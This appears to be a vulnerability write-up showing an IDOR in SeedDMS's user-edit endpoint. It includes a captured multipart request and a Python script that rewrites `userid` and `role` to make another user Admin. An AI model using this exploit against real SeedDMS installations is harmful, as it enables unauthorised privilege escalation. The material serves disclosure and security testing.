A simple IDOR allows the role of a different user to be changed by tampering with the `userid` and `role` parameters of the user-edit request.
Create two users, sunil and aman, through the user-management endpoint http://localhost/seeddms/out/out.UsrMgr.php, and check the list of users at http://localhost/seeddms/out/out.UserList.php.
In our case, the `userid` of aman is 5 and the `userid` of sunil is 6. (You can check this by hovering over or clicking a user's edit button; the `userid` appears in the URL.) Open aman's edit form and change the Role to Guest (adjust the `userid` parameter in the URL to match your own users). With Burp Suite intercepting, click the Save button and capture the request.
You will get a request like this:
```http
POST /seeddms/op/op.UsrMgr.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------113135331919090313053417803191
Content-Length: 1743
Origin: http://localhost
Connection: close
Referer: http://localhost/seeddms/out/out.UsrMgr.php?userid=5
Cookie: mydms_session=143fc0cdf34a682256baae37abda8ce2
Upgrade-Insecure-Requests: 1

-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="formtoken"

519192f812db211d797f140b67255d03
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="userid"

5
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="action"

edituser
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="login"

aman
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwd"


-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwdconf"


-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwdexpiration"


-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="name"

Aman User
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="comment"


-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="role"

2
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="homefolder"


-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="targetname13e65f6ab355d3a32705b2e99987d414"


-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="quota"

0
-----------------------------113135331919090313053417803191--
```

The two parts that matter are the `userid` field (5) and the `role` field (2).
In the intercepted request, change `userid` from 5 to 6 and `role` from 2 to 1. This retargets the request from Aman to Sunil and changes the assigned role from Guest (2) to Admin (1). Leave the `formtoken` and everything else as captured.
Now forward the modified request and switch the proxy off. The user list at http://localhost/seeddms/out/out.UserList.php shows that Sunil (userid=6), not Aman (userid=5), has been updated, and that Sunil's role is now Admin instead of Guest. Note that the `formtoken` issued for the userid=5 form was accepted unchanged for userid=6, so the token does not bind the request to the user being edited; the server applies the submitted `userid` and `role` as-is.
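The tampering step above, as an added Python example (this is not code from the original writeup or from SeedDMS): it parses the captured multipart request, swaps the `userid` and `role` fields, recomputes `Content-Length`, and prints a request that can be pasted into Burp Repeater. The sample request is constructed from the capture shown above (same path, boundary, `formtoken` and session cookie); the e-mail address is a placeholder because it is redacted on the page, and the role numbers 2 = Guest and 1 = Admin are taken from the writeup. Because `retarget` takes a dictionary of overrides, it can also rewrite `login` or `name` when the target's own details should be preserved, which goes slightly beyond what the writeup does.

```python
# Added example for this writeup (not code from the original post or from
# SeedDMS): rebuild the captured op.UsrMgr.php request with a different
# userid/role. The sample request is constructed from the capture above;
# the role numbers follow the writeup: 2 = Guest, 1 = Admin.
import re

ROLE_ADMIN, ROLE_GUEST = "1", "2"
BOUNDARY = "---------------------------113135331919090313053417803191"

# Constructed sample: the form fields of the captured request, in order.
# The e-mail address is a placeholder; it is redacted on the page.
CAPTURED_FIELDS = [
    ("formtoken", "519192f812db211d797f140b67255d03"),
    ("userid", "5"),
    ("action", "edituser"),
    ("login", "aman"),
    ("pwd", ""),
    ("pwdconf", ""),
    ("name", "Aman User"),
    ("email", "aman@example.com"),
    ("role", ROLE_GUEST),
    ("quota", "0"),
]


def build_multipart(fields, boundary):
    """Serialise (name, value) pairs as a multipart/form-data body."""
    parts = [
        f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
        for name, value in fields
    ]
    return "".join(parts) + f"--{boundary}--\r\n"


def parse_multipart(body, boundary):
    """Inverse of build_multipart: (name, value) pairs in their original order."""
    fields = []
    for part in body.split(f"--{boundary}"):
        if not part or part.startswith("--"):  # preamble or closing delimiter
            continue
        part = part.removeprefix("\r\n").removesuffix("\r\n")
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]*)"', headers)
        if match:
            fields.append((match.group(1), value))
    return fields


def split_request(raw):
    """Raw HTTP request -> (request line, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return request_line, headers, body


def assemble(request_line, headers, body):
    """Join the pieces back together; Content-Length is always recomputed."""
    headers = {**headers, "Content-Length": str(len(body.encode()))}
    head = "\r\n".join([request_line, *(f"{k}: {v}" for k, v in headers.items())])
    return f"{head}\r\n\r\n{body}"


def boundary_of(content_type):
    """Extract the boundary token from a multipart Content-Type header."""
    match = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not match:
        raise ValueError("not a multipart/form-data request")
    return match.group(2)


def retarget(raw, overrides):
    """Replace the form fields named in overrides; everything else, including
    the formtoken and the session cookie, is resent exactly as captured."""
    request_line, headers, body = split_request(raw)
    boundary = boundary_of(headers["Content-Type"])
    fields = [(n, overrides.get(n, v)) for n, v in parse_multipart(body, boundary)]
    return assemble(request_line, headers, build_multipart(fields, boundary))


CAPTURED_REQUEST = assemble(
    "POST /seeddms/op/op.UsrMgr.php HTTP/1.1",
    {
        "Host": "localhost",
        "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
        "Cookie": "mydms_session=143fc0cdf34a682256baae37abda8ce2",
        "Connection": "close",
    },
    build_multipart(CAPTURED_FIELDS, BOUNDARY),
)

if __name__ == "__main__":
    # Same change as the writeup: Aman (5, Guest) -> Sunil (6, Admin).
    print(retarget(CAPTURED_REQUEST, {"userid": "6", "role": ROLE_ADMIN}))
```

Running the module prints the retargeted request. Everything not overridden, including the `formtoken` and the `mydms_session` cookie, is resent byte-for-byte, which is exactly the condition the finding depends on: if the server honoured the token only for the `userid` it was issued for, the rewritten request would be rejected instead of updating Sunil.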